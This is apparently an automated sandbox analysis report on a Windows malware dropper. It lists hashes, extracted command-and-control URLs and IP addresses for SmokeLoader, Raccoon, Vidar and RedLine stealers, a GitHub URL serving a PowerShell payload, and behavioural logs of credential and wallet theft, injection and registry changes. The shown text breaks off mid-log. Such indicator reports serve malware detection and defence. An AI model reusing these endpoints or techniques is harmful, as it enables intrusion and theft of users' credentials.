Analysis
-
max time kernel
151s -
max time network
148s -
platform
windows10_x64 -
resource
win10-en-20210920 -
submitted
12-10-2021 13:48
Static task
static1
Behavioral task
behavioral1
Sample
8a78f31447361ca0becbdd0e4ebaa630d1f946006c8c7b3bcd022b53c63b4ac9.exe
Resource
win10-en-20210920
General
-
Target
8a78f31447361ca0becbdd0e4ebaa630d1f946006c8c7b3bcd022b53c63b4ac9.exe
-
Size
175KB
-
MD5
2e7e57118f032396e69d376486034f2a
-
SHA1
776f1be291d84052a024ce14883247eda7307f16
-
SHA256
8a78f31447361ca0becbdd0e4ebaa630d1f946006c8c7b3bcd022b53c63b4ac9
-
SHA512
fc2905c6f2a095b546ec751c47e28db472f38b89c3f62f71bf8c3cebaa77a5aaa9540340837fe690960beda1999b7dc59c8c9cbadfe30937ef26c2c1d7e108ff
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Extracted
smokeloader
2020
http://linavanandr11.club/
http://iselaharty12.club/
http://giovaninardo13.club/
http://zayneliann14.club/
http://zorinosali15.club/
Extracted
raccoon
1.8.2
fbe5e97e7d069407605ee9138022aa82166657e6
-
url4cnc
http://telemirror.top/stevuitreen
http://tgmirror.top/stevuitreen
http://telegatt.top/stevuitreen
http://telegka.top/stevuitreen
http://telegin.top/stevuitreen
https://t.me/stevuitreen
Extracted
vidar
41.3
1033
https://mas.to/@oleg98
-
profile_id
1033
Extracted
raccoon
1.8.2
8d179b9e611eee525425544ee8c6d77360ab7cd9
-
url4cnc
http://teletop.top/agrybirdsgamerept
http://teleta.top/agrybirdsgamerept
https://t.me/agrybirdsgamerept
Extracted
raccoon
1.8.2
27d80aa27e80cd2ef63c638e2752e24242d1b37c
-
url4cnc
http://telemirror.top/ararius809b
http://tgmirror.top/ararius809b
http://telegatt.top/ararius809b
http://telegka.top/ararius809b
http://telegin.top/ararius809b
https://t.me/ararius809b
Extracted
redline
w1
109.234.34.165:12323
Extracted
redline
MegaProliv
93.115.20.139:28978
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 5 IoCs
Processes:
resource yara_rule behavioral1/memory/3252-160-0x0000000000750000-0x0000000000781000-memory.dmp family_redline behavioral1/memory/3252-166-0x0000000002640000-0x000000000265C000-memory.dmp family_redline behavioral1/memory/1816-223-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral1/memory/1816-224-0x000000000041B25E-mapping.dmp family_redline behavioral1/memory/1816-251-0x0000000005230000-0x0000000005836000-memory.dmp family_redline -
ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
suricata: ET MALWARE ServHelper CnC Inital Checkin
suricata: ET MALWARE ServHelper CnC Inital Checkin
-
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
-
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
-
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
-
suricata: ET MALWARE Win32.Raccoon Stealer Data Exfil Attempt
suricata: ET MALWARE Win32.Raccoon Stealer Data Exfil Attempt
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Vidar Stealer 2 IoCs
Processes:
resource yara_rule behavioral1/memory/2120-130-0x00000000033C0000-0x0000000003496000-memory.dmp family_vidar behavioral1/memory/2120-131-0x0000000000400000-0x0000000001735000-memory.dmp family_vidar -
Blocklisted process makes network request 9 IoCs
Processes:
powershell.exeflow pid process 98 2252 powershell.exe 100 2252 powershell.exe 101 2252 powershell.exe 102 2252 powershell.exe 104 2252 powershell.exe 106 2252 powershell.exe 108 2252 powershell.exe 110 2252 powershell.exe 112 2252 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 9 IoCs
Processes:
B18.exe1097.exe252A.exe343E.exe398E.exe4065.exe4B72.exe519E.exe519E.exepid process 2116 B18.exe 2120 1097.exe 340 252A.exe 1376 343E.exe 3600 398E.exe 3252 4065.exe 2236 4B72.exe 1724 519E.exe 1816 519E.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource yara_rule \Windows\Branding\mediasrv.png upx \Windows\Branding\mediasvc.png upx -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\343E.exe vmprotect C:\Users\Admin\AppData\Local\Temp\343E.exe vmprotect behavioral1/memory/1376-146-0x0000000000A60000-0x00000000018A6000-memory.dmp vmprotect -
Deletes itself 1 IoCs
Processes:
pid process 392 -
Loads dropped DLL 9 IoCs
Processes:
1097.exeB18.exepid process 2120 1097.exe 2120 1097.exe 3636 3636 2116 B18.exe 2116 B18.exe 2116 B18.exe 2116 B18.exe 2116 B18.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
Processes:
B18.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts B18.exe -
Accesses Microsoft Outlook profiles 1 TTPs 8 IoCs
Processes:
B18.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook B18.exe Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook B18.exe Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook B18.exe Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook B18.exe Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook B18.exe Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook B18.exe Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook B18.exe Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook B18.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File created C:\Windows\SysWOW64\rdpclip.exe powershell.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
8a78f31447361ca0becbdd0e4ebaa630d1f946006c8c7b3bcd022b53c63b4ac9.exe519E.exedescription pid process target process PID 2388 set thread context of 3440 2388 8a78f31447361ca0becbdd0e4ebaa630d1f946006c8c7b3bcd022b53c63b4ac9.exe 8a78f31447361ca0becbdd0e4ebaa630d1f946006c8c7b3bcd022b53c63b4ac9.exe PID 1724 set thread context of 1816 1724 519E.exe 519E.exe -
Drops file in Program Files directory 4 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI powershell.exe -
Drops file in Windows directory 24 IoCs
Processes:
powershell.exepowershell.exepowershell.exedescription ioc process File created C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIB7B5.tmp powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_0xbgxfbj.t11.ps1 powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIB7C6.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIB7C7.tmp powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_2d0rdsal.alc.psm1 powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIB794.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIB7A5.tmp powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
8a78f31447361ca0becbdd0e4ebaa630d1f946006c8c7b3bcd022b53c63b4ac9.exedescription ioc process Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 8a78f31447361ca0becbdd0e4ebaa630d1f946006c8c7b3bcd022b53c63b4ac9.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 8a78f31447361ca0becbdd0e4ebaa630d1f946006c8c7b3bcd022b53c63b4ac9.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 8a78f31447361ca0becbdd0e4ebaa630d1f946006c8c7b3bcd022b53c63b4ac9.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
1097.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 1097.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 1097.exe -
Delays execution with timeout.exe 2 IoCs
Processes:
timeout.exetimeout.exepid process 2424 timeout.exe 908 timeout.exe -
Kills process with taskkill 1 IoCs
Processes:
taskkill.exepid process 4004 taskkill.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exeWMIC.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Flags = "1" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\LowIcon = "inetcpl.cpl#005426" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "Computer" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Flags = "71" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0\2ba02e083fadee33 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c004900450035005f00550041005f004200610063006b00750070005f0046006c00610067002c0000000100080035002e0030000000000000000000 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\57fd7ae31ab34c2c = ",33,HKCU,SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Extensible Cache," powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1200 = "0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Description = "This zone contains all Web sites that are on your organization's intranet." powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\PMDisplayName = "Trusted sites [Protected Mode]" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Flags = "33" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Flags = "3" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZonesSecurityUpgrade = a63109125baed701 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\DisplayName = "Local intranet" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\CurrentLevel = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges\ powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\e1be3f182420a0a0 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones," powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\LowIcon = "inetcpl.cpl#005424" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\CurrentLevel = "0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1400 = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Description = "Your computer" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\https = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\DisplayName = "Internet" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\1200 = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1200 = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Icon = "shell32.dll#0016" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableNegotiate = "1" powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0\e1be3f182420a0a0 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c000000 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\LowIcon = "inetcpl.cpl#005425" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\DisplayName = "Trusted sites" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Description = "This zone contains Web sites that could potentially damage your computer or data." powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\16\52C64B7E powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe -
Modifies registry key 1 TTPs 2 IoCs
-
Runs net.exe
-
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 100 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 101 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 102 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 104 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
8a78f31447361ca0becbdd0e4ebaa630d1f946006c8c7b3bcd022b53c63b4ac9.exepid process 3440 8a78f31447361ca0becbdd0e4ebaa630d1f946006c8c7b3bcd022b53c63b4ac9.exe 3440 8a78f31447361ca0becbdd0e4ebaa630d1f946006c8c7b3bcd022b53c63b4ac9.exe 392 392 392 392 392 392 392 392 392 392 392 392 392 392 392 392 392 392 392 392 392 392 392 392 392 392 392 392 392 392 392 392 392 392 392 392 392 392 392 392 392 392 392 392 392 392 392 392 392 392 392 392 392 392 392 392 392 392 392 392 392 392 -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid process 392 -
Suspicious behavior: LoadsDriver 3 IoCs
Processes:
pid process 624 624 624 -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
8a78f31447361ca0becbdd0e4ebaa630d1f946006c8c7b3bcd022b53c63b4ac9.exepid process 3440 8a78f31447361ca0becbdd0e4ebaa630d1f946006c8c7b3bcd022b53c63b4ac9.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
taskkill.exepowershell.exe4065.exepowershell.exepowershell.exe519E.exepowershell.exedescription pid process Token: SeShutdownPrivilege 392 Token: SeCreatePagefilePrivilege 392 Token: SeShutdownPrivilege 392 Token: SeCreatePagefilePrivilege 392 Token: SeDebugPrivilege 4004 taskkill.exe Token: SeShutdownPrivilege 392 Token: SeCreatePagefilePrivilege 392 Token: SeShutdownPrivilege 392 Token: SeCreatePagefilePrivilege 392 Token: SeShutdownPrivilege 392 Token: SeCreatePagefilePrivilege 392 Token: SeShutdownPrivilege 392 Token: SeCreatePagefilePrivilege 392 Token: SeDebugPrivilege 1768 powershell.exe Token: SeDebugPrivilege 3252 4065.exe Token: SeShutdownPrivilege 392 Token: SeCreatePagefilePrivilege 392 Token: SeShutdownPrivilege 392 Token: SeCreatePagefilePrivilege 392 Token: SeShutdownPrivilege 392 Token: SeCreatePagefilePrivilege 392 Token: SeDebugPrivilege 2680 powershell.exe Token: SeDebugPrivilege 2208 powershell.exe Token: SeDebugPrivilege 1816 519E.exe Token: SeIncreaseQuotaPrivilege 2680 powershell.exe Token: SeSecurityPrivilege 2680 powershell.exe Token: SeTakeOwnershipPrivilege 2680 powershell.exe Token: SeLoadDriverPrivilege 2680 powershell.exe Token: SeSystemProfilePrivilege 2680 powershell.exe Token: SeSystemtimePrivilege 2680 powershell.exe Token: SeProfSingleProcessPrivilege 2680 powershell.exe Token: SeIncBasePriorityPrivilege 2680 powershell.exe Token: SeCreatePagefilePrivilege 2680 powershell.exe Token: SeBackupPrivilege 2680 powershell.exe Token: SeRestorePrivilege 2680 powershell.exe Token: SeShutdownPrivilege 2680 powershell.exe Token: SeDebugPrivilege 2680 powershell.exe Token: SeSystemEnvironmentPrivilege 2680 powershell.exe Token: SeRemoteShutdownPrivilege 2680 powershell.exe Token: SeUndockPrivilege 2680 powershell.exe Token: SeManageVolumePrivilege 2680 powershell.exe Token: 33 2680 powershell.exe Token: 34 2680 powershell.exe Token: 35 2680 powershell.exe Token: 36 2680 powershell.exe Token: SeDebugPrivilege 676 powershell.exe Token: SeIncreaseQuotaPrivilege 676 powershell.exe Token: SeSecurityPrivilege 676 powershell.exe Token: SeTakeOwnershipPrivilege 676 powershell.exe Token: SeLoadDriverPrivilege 676 powershell.exe Token: SeSystemProfilePrivilege 676 powershell.exe Token: SeSystemtimePrivilege 676 powershell.exe Token: SeProfSingleProcessPrivilege 676 powershell.exe Token: SeIncBasePriorityPrivilege 676 powershell.exe Token: SeCreatePagefilePrivilege 676 powershell.exe Token: SeBackupPrivilege 676 powershell.exe Token: SeRestorePrivilege 676 powershell.exe Token: SeShutdownPrivilege 676 powershell.exe Token: SeDebugPrivilege 676 powershell.exe Token: SeSystemEnvironmentPrivilege 676 powershell.exe Token: SeRemoteShutdownPrivilege 676 powershell.exe Token: SeUndockPrivilege 676 powershell.exe Token: SeManageVolumePrivilege 676 powershell.exe Token: 33 676 powershell.exe -
Suspicious use of FindShellTrayWindow 5 IoCs
Processes:
pid process 392 392 392 392 392 -
Suspicious use of SendNotifyMessage 5 IoCs
Processes:
pid process 392 392 392 392 392 -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
8a78f31447361ca0becbdd0e4ebaa630d1f946006c8c7b3bcd022b53c63b4ac9.exe1097.execmd.exe519E.exe343E.exepowershell.execsc.exe4B72.exepowershell.execsc.exedescription pid process target process PID 2388 wrote to memory of 3440 2388 8a78f31447361ca0becbdd0e4ebaa630d1f946006c8c7b3bcd022b53c63b4ac9.exe 8a78f31447361ca0becbdd0e4ebaa630d1f946006c8c7b3bcd022b53c63b4ac9.exe PID 2388 wrote to memory of 3440 2388 8a78f31447361ca0becbdd0e4ebaa630d1f946006c8c7b3bcd022b53c63b4ac9.exe 8a78f31447361ca0becbdd0e4ebaa630d1f946006c8c7b3bcd022b53c63b4ac9.exe PID 2388 wrote to memory of 3440 2388 8a78f31447361ca0becbdd0e4ebaa630d1f946006c8c7b3bcd022b53c63b4ac9.exe 8a78f31447361ca0becbdd0e4ebaa630d1f946006c8c7b3bcd022b53c63b4ac9.exe PID 2388 wrote to memory of 3440 2388 8a78f31447361ca0becbdd0e4ebaa630d1f946006c8c7b3bcd022b53c63b4ac9.exe 8a78f31447361ca0becbdd0e4ebaa630d1f946006c8c7b3bcd022b53c63b4ac9.exe PID 2388 wrote to memory of 3440 2388 8a78f31447361ca0becbdd0e4ebaa630d1f946006c8c7b3bcd022b53c63b4ac9.exe 8a78f31447361ca0becbdd0e4ebaa630d1f946006c8c7b3bcd022b53c63b4ac9.exe PID 2388 wrote to memory of 3440 2388 8a78f31447361ca0becbdd0e4ebaa630d1f946006c8c7b3bcd022b53c63b4ac9.exe 8a78f31447361ca0becbdd0e4ebaa630d1f946006c8c7b3bcd022b53c63b4ac9.exe PID 392 wrote to memory of 2116 392 B18.exe PID 392 wrote to memory of 2116 392 B18.exe PID 392 wrote to memory of 2116 392 B18.exe PID 392 wrote to memory of 2120 392 1097.exe PID 392 wrote to memory of 2120 392 1097.exe PID 392 wrote to memory of 2120 392 1097.exe PID 392 wrote to memory of 340 392 252A.exe PID 392 wrote to memory of 340 392 252A.exe PID 392 wrote to memory of 340 392 252A.exe PID 392 wrote to memory of 1376 392 343E.exe PID 392 wrote to memory of 1376 392 343E.exe PID 392 wrote to memory of 3600 392 398E.exe PID 392 wrote to memory of 3600 392 398E.exe PID 392 wrote to memory of 3600 392 398E.exe PID 392 wrote to memory of 3252 392 4065.exe PID 392 wrote to memory of 3252 392 4065.exe PID 392 wrote to memory of 3252 392 4065.exe PID 2120 wrote to memory of 1732 2120 1097.exe cmd.exe PID 2120 wrote to memory of 1732 2120 1097.exe cmd.exe PID 2120 wrote to memory of 1732 2120 1097.exe cmd.exe PID 1732 wrote to memory of 4004 1732 cmd.exe taskkill.exe PID 1732 wrote to memory of 4004 1732 cmd.exe taskkill.exe PID 1732 wrote to memory of 4004 1732 cmd.exe taskkill.exe PID 392 wrote to memory of 2236 392 4B72.exe PID 392 wrote to memory of 2236 392 4B72.exe PID 392 wrote to memory of 2236 392 4B72.exe PID 1732 wrote to memory of 2424 1732 cmd.exe timeout.exe PID 1732 wrote to memory of 2424 1732 cmd.exe timeout.exe PID 1732 wrote to memory of 2424 1732 cmd.exe timeout.exe PID 392 wrote to memory of 1724 392 519E.exe PID 392 wrote to memory of 1724 392 519E.exe PID 392 wrote to memory of 1724 392 519E.exe PID 1724 wrote to memory of 1816 1724 519E.exe 519E.exe PID 1724 wrote to memory of 1816 1724 519E.exe 519E.exe PID 1724 wrote to memory of 1816 1724 519E.exe 519E.exe PID 1376 wrote to memory of 1768 1376 343E.exe powershell.exe PID 1376 wrote to memory of 1768 1376 343E.exe powershell.exe PID 1768 wrote to memory of 2856 1768 